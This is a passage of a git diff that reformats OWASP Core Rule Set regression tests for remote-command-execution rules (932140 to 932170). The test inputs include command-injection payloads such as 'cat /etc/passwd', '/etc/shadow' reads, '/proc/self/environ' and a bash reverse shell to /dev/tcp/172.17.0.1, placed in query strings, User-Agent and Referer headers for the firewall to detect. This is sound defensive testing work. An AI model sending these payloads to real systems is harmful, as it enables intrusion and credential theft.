"/get?foo=if+not+%22A%251%22+%3D%3D+%22A%22+%28" + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 145 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=IF+DEFINED+ARG+%28echo+%22It+is+defined%3A+%251%22%29+ELSE+%28echo+%22%25%251+is+not+defined%22%29" + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 146 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=if3q+hfy6e8egfxsjtewc838gsfbhwvw9qzfty3gjs86syg7y6mrpwgw4ekureakjpk6%2Flyghe9pnfekpw2yt8svzseinhs1rbkuu%2Fzq15u5wh8nj8dd+fn86qcdwzv3s9hw35e14pxgcv34dhmt1mwbxnicwudjawfqz+fphmr5vlnufdihoffpuvqwkcmom61i3lisyxg65fx+rgbnrs6e4pmbvy2xl+vwb8oct23cyypregi638dkychllvvw5kq7rolfbhk3hojxz9tthunqky9dodqbb6u8roh+firwx8kuf1dfgewcto9eljhuaoqgdk4qwxlziktaf1mw2atcmw7jvzsh1s0kngiepps54lj4wtcbfzfvbqb7y3caffhnvfrm3tbjxlywqakfqxoprh7yooguat5flg2ozx5%2Fafn7w%3D%3D" + version: HTTP/1.0 + output: + no_log_contains: id "932140" + - test_id: 147 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=if+a%3D%3Db+foo" + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 148 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=if%2Fi+a%3D%3Db+foo" + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 149 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=if+%2Fi+a%3D%3Db+foo" + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 150 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=if+%2Fi+%22a%22%3D%3D%22b%22++foo" + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 151 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=if+%2Fi+not++%22a%22%3D%3D%22b%22++foo" + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 152 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=if+++exist+StorageServer.port+echo+yay" + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 153 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=if+%2Fi+exist+StorageServer.port+echo+yay" + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 154 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=ifq+a%3D%3Db+foo" + version: HTTP/1.0 + output: + no_log_contains: id "932140" + - test_id: 155 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=iffoo+a%3D%3Db+foo" + version: HTTP/1.0 + output: + no_log_contains: id "932140" + - test_id: 156 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=if3+a%3D%3Db+foo" + version: HTTP/1.0 + output: + no_log_contains: id "932140" + - test_id: 157 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=if3q+a%3D%3Db+foo" + version: HTTP/1.0 + output: + no_log_contains: id "932140" + - test_id: 158 desc: | FP when using `t:urlDecodeUni`. Using `t:urlDecodeUni` removes the `+` from the encoded value in the XML document, which produced a false positive match. See https://github.com/coreruleset/coreruleset/issues/1785 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/xml - method: POST - port: 80 - uri: "/post" - version: HTTP/1.0 - data: if+foo== - output: - no_log_contains: id "932140" + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/xml + method: POST + port: 80 + uri: "/post" + version: HTTP/1.0 + data: if+foo== + output: + no_log_contains: id "932140" diff --git a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932160.yaml b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932160.yaml index 300ea3657..993e9b989 100644 --- a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932160.yaml +++ b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932160.yaml @@ -1,236 +1,221 @@ --- meta: author: "Paul Beckett, Esad Cetiner, azurit" - enabled: true - name: "932160.yaml" description: "Tests to trigger or not trigger rule 932160" +rule_id: 932160 tests: - - test_title: 932160-1 + - test_id: 1 stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get?932160-1=cat%20/etc/passwd" - version: "HTTP/1.1" - output: - log_contains: "id \"932160\"" - - test_title: 932160-2 + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get?932160-1=cat%20/etc/passwd" + version: "HTTP/1.1" + output: + log_contains: "id \"932160\"" + - test_id: 2 stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "POST" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/post" - data: "932160-2=/usr/bin/perl -e 'print readline' some-file.txt" - version: "HTTP/1.1" - output: - log_contains: "id \"932160\"" - - test_title: 932160-3 + - input: + dest_addr: "127.0.0.1" + method: "POST" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/post" + data: "932160-2=/usr/bin/perl -e 'print readline' some-file.txt" + version: "HTTP/1.1" + output: + log_contains: "id \"932160\"" + - test_id: 3 stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Cookie: "931120-3=/usr/bin/python3 -m http.server" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get" - version: "HTTP/1.1" - output: - log_contains: "id \"932160\"" - - test_title: 932160-4 + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Cookie: "931120-3=/usr/bin/python3 -m http.server" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get" + version: "HTTP/1.1" + output: + log_contains: "id \"932160\"" + - test_id: 4 stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "POST" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/post" - data: '932160-2=dont match commands that are not fully qualified like bash python and perl.' - version: "HTTP/1.1" - output: - no_log_contains: "id \"932160\"" - - test_title: 932160-5 + - input: + dest_addr: "127.0.0.1" + method: "POST" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/post" + data: '932160-2=dont match commands that are not fully qualified like bash python and perl.' + version: "HTTP/1.1" + output: + no_log_contains: "id \"932160\"" + - test_id: 5 desc: "Positive test: Match against bin/gunzip" stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "POST" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/post" - data: 'cmd=/bin/gunzip -c /var/log/something_sensitive.gz' - version: "HTTP/1.1" - output: - log_contains: "id \"932160\"" - - test_title: 932160-6 + - input: + dest_addr: "127.0.0.1" + method: "POST" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/post" + data: 'cmd=/bin/gunzip -c /var/log/something_sensitive.gz' + version: "HTTP/1.1" + output: + log_contains: "id \"932160\"" + - test_id: 6 desc: "Positive test: Match against bin/unxz" stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "POST" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/post" - data: 'cmd=/bin/unxz -c /var/log/something_sensitive.xz' - version: "HTTP/1.1" - output: - log_contains: "id \"932160\"" - - test_title: 932160-7 + - input: + dest_addr: "127.0.0.1" + method: "POST" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/post" + data: 'cmd=/bin/unxz -c /var/log/something_sensitive.xz' + version: "HTTP/1.1" + output: + log_contains: "id \"932160\"" + - test_id: 7 desc: "Negative test: Don't match against the word zip" stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "POST" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/post" - data: 'sentence=The zip on my coat is stuck' - version: "HTTP/1.1" - output: - no_log_contains: "id \"932160\"" - - test_title: 932160-8 + - input: + dest_addr: "127.0.0.1" + method: "POST" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/post" + data: 'sentence=The zip on my coat is stuck' + version: "HTTP/1.1" + output: + no_log_contains: "id \"932160\"" + - test_id: 8 desc: "Positive test: Triggering only this rule and no other one" stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "POST" - uri: "/post" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - data: 'cmd=/bin/ab' - version: "HTTP/1.1" - output: - log_contains: "id \"932160\"" - - test_title: 932160-9 + - input: + dest_addr: "127.0.0.1" + method: "POST" + uri: "/post" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + data: 'cmd=/bin/ab' + version: "HTTP/1.1" + output: + log_contains: "id \"932160\"" + - test_id: 9 desc: "Positive test: Unix Command Injection - $SHELL test" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: "localhost" - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - # code=$SHELL -c "echo hi" - uri: "/get?code=%24SHELL%20-c%20%22echo%20hi%22" - version: HTTP/1.0 - output: - log_contains: id "932160" - - test_title: 932160-10 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: "localhost" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + # code=$SHELL -c "echo hi" + uri: "/get?code=%24SHELL%20-c%20%22echo%20hi%22" + version: HTTP/1.0 + output: + log_contains: id "932160" + - test_id: 10 desc: "Positive test: Unix Command Injection - ${SHELL} test" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: "localhost" - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - # code=${SHELL} -c "echo hi" - uri: "/get?code=%24%7BSHELL%7D%20-c%20%22echo%20hi%22" - version: HTTP/1.0 - output: - log_contains: id "932160" - - test_title: 932160-11 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: "localhost" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + # code=${SHELL} -c "echo hi" + uri: "/get?code=%24%7BSHELL%7D%20-c%20%22echo%20hi%22" + version: HTTP/1.0 + output: + log_contains: id "932160" + - test_id: 11 desc: "Positive test: Match against bin/ansible" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: "localhost" - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?a=bin/ansible" - version: HTTP/1.0 - output: - log_contains: id "932160" - - test_title: 932160-12 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: "localhost" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?a=bin/ansible" + version: HTTP/1.0 + output: + log_contains: id "932160" + - test_id: 12 desc: "Positive test: Match against bin/chef" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: "localhost" - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?a=bin/chef" - version: HTTP/1.0 - output: - log_contains: id "932160" - - test_title: 932160-13 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: "localhost" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?a=bin/chef" + version: HTTP/1.0 + output: + log_contains: id "932160" + - test_id: 13 desc: "Positive test: Match against bin/cscli" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: "localhost" - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?a=bin/cscli" - version: HTTP/1.0 - output: - log_contains: id "932160" - - test_title: 932160-14 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: "localhost" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?a=bin/cscli" + version: HTTP/1.0 + output: + log_contains: id "932160" + - test_id: 14 desc: "Positive test: Match against bin/visudo" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: "localhost" - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?a=bin/visudo" - version: HTTP/1.0 - output: - log_contains: id "932160" + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: "localhost" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?a=bin/visudo" + version: HTTP/1.0 + output: + log_contains: id "932160" diff --git a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932161.yaml b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932161.yaml index 816c0c269..0667f10fb 100644 --- a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932161.yaml +++ b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932161.yaml @@ -1,192 +1,178 @@ --- meta: author: "Franziska Bühler, azurit" - enabled: true - name: "932161.yaml" tests: - - test_title: 932161-1 + - test_id: 1 stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: cat /etc/passwd - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get" - version: "HTTP/1.1" - output: - log_contains: "id \"932161\"" - - test_title: 932161-2 + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: cat /etc/passwd + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get" + version: "HTTP/1.1" + output: + log_contains: "id \"932161\"" + - test_id: 2 stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: /etc/shadow - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get" - version: "HTTP/1.1" - output: - log_contains: "id \"932161\"" - - test_title: 932161-3 + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: /etc/shadow + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get" + version: "HTTP/1.1" + output: + log_contains: "id \"932161\"" + - test_id: 3 stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: cat /proc/self/environ - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get" - version: "HTTP/1.1" - output: - log_contains: "id \"932161\"" - - test_title: 932161-4 + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: cat /proc/self/environ + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get" + version: "HTTP/1.1" + output: + log_contains: "id \"932161\"" + - test_id: 4 stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: dd if=/etc/passwd of=/tmp/evil.sh bs=1 skip=22 count=9 - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get" - version: "HTTP/1.1" - output: - log_contains: "id \"932161\"" - - test_title: 932161-5 + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: dd if=/etc/passwd of=/tmp/evil.sh bs=1 skip=22 count=9 + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get" + version: "HTTP/1.1" + output: + log_contains: "id \"932161\"" + - test_id: 5 stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: /bin/bash -c "sh -i>& /dev/tcp/172.17.0.1/54321 0>&1" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get" - version: "HTTP/1.1" - output: - log_contains: "id \"932161\"" - - test_title: 932161-6 + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: /bin/bash -c "sh -i>& /dev/tcp/172.17.0.1/54321 0>&1" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get" + version: "HTTP/1.1" + output: + log_contains: "id \"932161\"" + - test_id: 6 stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: &/dev/tcp/172.17.0.1/54321 0>&1\'`; ?> - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get" - version: "HTTP/1.1" - output: - log_contains: "id \"932161\"" - - test_title: 932161-7 + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: &/dev/tcp/172.17.0.1/54321 0>&1\'`; ?> + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get" + version: "HTTP/1.1" + output: + log_contains: "id \"932161\"" + - test_id: 7 stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Referer: cat /etc/passwd - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get" - version: "HTTP/1.1" - output: - log_contains: "id \"932161\"" - - test_title: 932161-8 + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Referer: cat /etc/passwd + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get" + version: "HTTP/1.1" + output: + log_contains: "id \"932161\"" + - test_id: 8 stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Referer: /etc/shadow - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get" - version: "HTTP/1.1" - output: - log_contains: "id \"932161\"" - - test_title: 932161-9 + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Referer: /etc/shadow + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get" + version: "HTTP/1.1" + output: + log_contains: "id \"932161\"" + - test_id: 9 stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Referer: cat /proc/self/environ - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get" - version: "HTTP/1.1" - output: - log_contains: "id \"932161\"" - - test_title: 932161-10 + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Referer: cat /proc/self/environ + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get" + version: "HTTP/1.1" + output: + log_contains: "id \"932161\"" + - test_id: 10 stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Referer: dd if=/etc/passwd of=/tmp/evil.sh bs=1 skip=22 count=9 - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get" - version: "HTTP/1.1" - output: - log_contains: "id \"932161\"" - - test_title: 932161-11 + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Referer: dd if=/etc/passwd of=/tmp/evil.sh bs=1 skip=22 count=9 + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get" + version: "HTTP/1.1" + output: + log_contains: "id \"932161\"" + - test_id: 11 stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Referer: /bin/bash -c "sh -i>& /dev/tcp/172.17.0.1/54321 0>&1" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get" - version: "HTTP/1.1" - output: - log_contains: "id \"932161\"" - - test_title: 932161-12 + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Referer: /bin/bash -c "sh -i>& /dev/tcp/172.17.0.1/54321 0>&1" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get" + version: "HTTP/1.1" + output: + log_contains: "id \"932161\"" + - test_id: 12 stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Referer: &/dev/tcp/172.17.0.1/54321 0>&1\'`; ?> - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get" - version: "HTTP/1.1" - output: - log_contains: "id \"932161\"" + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Referer: &/dev/tcp/172.17.0.1/54321 0>&1\'`; ?> + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get" + version: "HTTP/1.1" + output: + log_contains: "id \"932161\"" diff --git a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932170.yaml b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932170.yaml index 7abbc9c97..6e8179bd9 100644 --- a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932170.yaml +++ b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932170.yaml @@ -2,24 +2,22 @@ meta: author: "Franziska Bühler, azurit" description: "Remote Command Execution: Shellshock (CVE-2014-6271)" - enabled: true - name: 932170.yaml +rule_id: 932170 tests: - - test_title: 932170-1 + - test_id: 1 desc: "Test for '() {' in request header test" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: 